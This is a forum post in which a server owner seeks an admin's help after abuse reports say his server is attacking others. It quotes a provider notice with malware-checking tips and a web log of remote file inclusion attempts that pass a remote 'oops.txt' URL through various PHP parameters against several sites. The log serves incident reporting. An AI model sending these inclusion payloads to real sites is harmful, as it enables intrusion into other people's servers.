I think my server has been hacked and it's attacking other servers..
I thought my colo was off the his rocker when he first complained to me yesterday.. Today he got another notification from a different source...
Need an experienced Linux/CentOS server admin to check out my server and correct any issues he/she may find..
======================
NOTES:
This type of attack typically mean the server for which the IP address
of the attacker is bound is a compromised server.
Please check the server behind the IP address above for suspicious
files in /tmp, /var/tmp, /dev/shm, /var/spool/samba, /var/spool/vbox,
/var/spool/squid, and /var/spool/cron Please use "ls -lab" for
checking directories as sometimes compromised servers will have hidden
files that a regular "ls" will not show.
Please also check the process tree (ps -efl or ps -auwx) for
suspicious processes; often times the malware / hack pretends to be an
Apache process.
Linux Malware Detect is an excellent program for finding malware on a
server. You can find the latest version at
http://www.rfxn.com/projects/linux-malware-detect/
Clam Anti-virus, clamscan, can also be used to find commonly used PHP
and Perl-based hacks, including various php shells, on a server using
the “--infected” and “--recursive” options.
You may also want to check out using root kit detection tools -
http://www.chkrootkit.org/, http://www.rootkit.nl/, and
http://www.ossec.net/en/rootcheck.html as tools which should be used
in addition to checking the directories and process tree.
### EOF NOTES ###
Please take appropriate action to stop these attacks from happening.
Thank you very much for your time.
TIA
Ed
I thought my colo was off the his rocker when he first complained to me yesterday.. Today he got another notification from a different source...
Need an experienced Linux/CentOS server admin to check out my server and correct any issues he/she may find..
======================
NOTES:
This type of attack typically mean the server for which the IP address
of the attacker is bound is a compromised server.
Please check the server behind the IP address above for suspicious
files in /tmp, /var/tmp, /dev/shm, /var/spool/samba, /var/spool/vbox,
/var/spool/squid, and /var/spool/cron Please use "ls -lab" for
checking directories as sometimes compromised servers will have hidden
files that a regular "ls" will not show.
Please also check the process tree (ps -efl or ps -auwx) for
suspicious processes; often times the malware / hack pretends to be an
Apache process.
Linux Malware Detect is an excellent program for finding malware on a
server. You can find the latest version at
http://www.rfxn.com/projects/linux-malware-detect/
Clam Anti-virus, clamscan, can also be used to find commonly used PHP
and Perl-based hacks, including various php shells, on a server using
the “--infected” and “--recursive” options.
You may also want to check out using root kit detection tools -
http://www.chkrootkit.org/, http://www.rootkit.nl/, and
http://www.ossec.net/en/rootcheck.html as tools which should be used
in addition to checking the directories and process tree.
### EOF NOTES ###
Please take appropriate action to stop these attacks from happening.
Thank you very much for your time.
Code:
Type of attack:
Sample log report including date and time stamp (1st field is the word
"request", 2nd field is the IP address or the domain name being
attacked, and the 3rd field is the IP address or domain name of the
attacker):
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:36 +0000]
"GET /index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518
"-" "-" UK-doFQz7pAAADzVrsk "-"
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:48 +0000]
"GET /index.php?main=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518
"-" "-" UK-drFQz7pAAAF0ChVY "-"
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:59 +0000]
"GET /index.php?go=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-"
"-" UK-dt1Qz7pAAADzLoi8 "-"
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:10 +0000]
"GET /index.php?goto=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518
"-" "-" UK-dwlQz7pAAADzInIY "-"
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:21 +0000]
"GET /index.php?jump=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518
"-" "-" UK-dzVQz7pAAADzFmuE "-"
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:32 +0000]
"GET /index.php?url=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-"
"-" UK-d2FQz7pAAAF1no7s "-"
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:43 +0000]
"GET /index.php?lng=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-"
"-" UK-d41Qz7pAAADzdvYM "-"
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:54 +0000]
"GET /index.php?get=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-"
"-" UK-d7lQz7pAAADywcZ0 "-"
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:35:05 +0000]
"GET /index.php?link=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518
"-" "-" UK-d@VQz7pAAADy9lTA "-"
Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:35:16 +0000]
"GET /index.php?open=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518
"-" "-" UK-eBFQz7pAAADzfwII "-"
Request: thelimousinecompany.ie 204.15.197.36 - -
[23/Nov/2012:20:58:53 +0000] "GET
/index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"
UK-jjVQz7pAAAGMpHwk "-"
Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:58:53
+0000] "GET /index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500
3506 "-" "-" UK-jjVQz7pAAAGM3K@A "-"
Request: thelimousinecompany.ie 204.15.197.36 - -
[23/Nov/2012:20:59:05 +0000] "GET
/index.php?main=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"
UK-jmVQz7pAAABz8XSc "-"
Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:06
+0000] "GET /index.php?main=http://5.9.188.62/oops.txt? HTTP/1.1" 500
3506 "-" "-" UK-jmlQz7pAAABx2DqI "-"
Request: thelimousinecompany.ie 204.15.197.36 - -
[23/Nov/2012:20:59:17 +0000] "GET
/index.php?go=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"
UK-jpVQz7pAAAGMpHww "-"
Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:17
+0000] "GET /index.php?go=http://5.9.188.62/oops.txt? HTTP/1.1" 500
3506 "-" "-" UK-jpVQz7pAAABx8GVM "-"
Request: thelimousinecompany.ie 204.15.197.36 - -
[23/Nov/2012:20:59:29 +0000] "GET
/index.php?goto=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"
UK-jsVQz7pAAADzPqGw "-"
Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:29
+0000] "GET /index.php?goto=http://5.9.188.62/oops.txt? HTTP/1.1" 500
3506 "-" "-" UK-jsVQz7pAAADzSqfc "-"
Request: thelimousinecompany.ie 204.15.197.36 - -
[23/Nov/2012:20:59:40 +0000] "GET
/index.php?jump=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"
UK-jvFQz7pAAABx4Ebg "-"
Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:40
+0000] "GET /index.php?jump=http://5.9.188.62/oops.txt? HTTP/1.1" 500
3506 "-" "-" UK-jvFQz7pAAAByOINM "-"
Request: thelimousinecompany.ie 204.15.197.36 - -
[23/Nov/2012:20:59:51 +0000] "GET
/index.php?url=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"
UK-jx1Qz7pAAABx2Dqw "-"
Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:51
+0000] "GET /index.php?url=http://5.9.188.62/oops.txt? HTTP/1.1" 500
3506 "-" "-" UK-jx1Qz7pAAAGMrI-U "-"
Request: thelimousinecompany.ie 204.15.197.36 - -
[23/Nov/2012:21:00:03 +0000] "GET
/index.php?lng=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"
UK-j01Qz7pAAAGMrI-c "-"
Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:21:00:03
+0000] "GET /index.php?lng=http://5.9.188.62/oops.txt? HTTP/1.1" 500
3506 "-" "-" UK-j01Qz7pAAAGMpHxM "-"
Request: thelimousinecompany.ie 204.15.197.36 - -
[23/Nov/2012:21:00:15 +0000] "GET
/index.php?get=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"
UK-j31Qz7pAAAGMpHxU "-"
Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:21:00:15
+0000] "GET /index.php?get=http://5.9.188.62/oops.txt? HTTP/1.1" 500
3506 "-" "-" UK-j31Qz7pAAABx2DrI "-"
Request: thelimousinecompany.ie 204.15.197.36 - -
[23/Nov/2012:21:00:27 +0000] "GET
/index.php?link=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"
UK-j61Qz7pAAADzKodQ "-"
Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:21:00:28
+0000] "GET /index.php?link=http://5.9.188.62/oops.txt? HTTP/1.1" 500
3506 "-" "-" UK-j7FQz7pAAADzFm8I "-"
TIA
Ed
Last edited: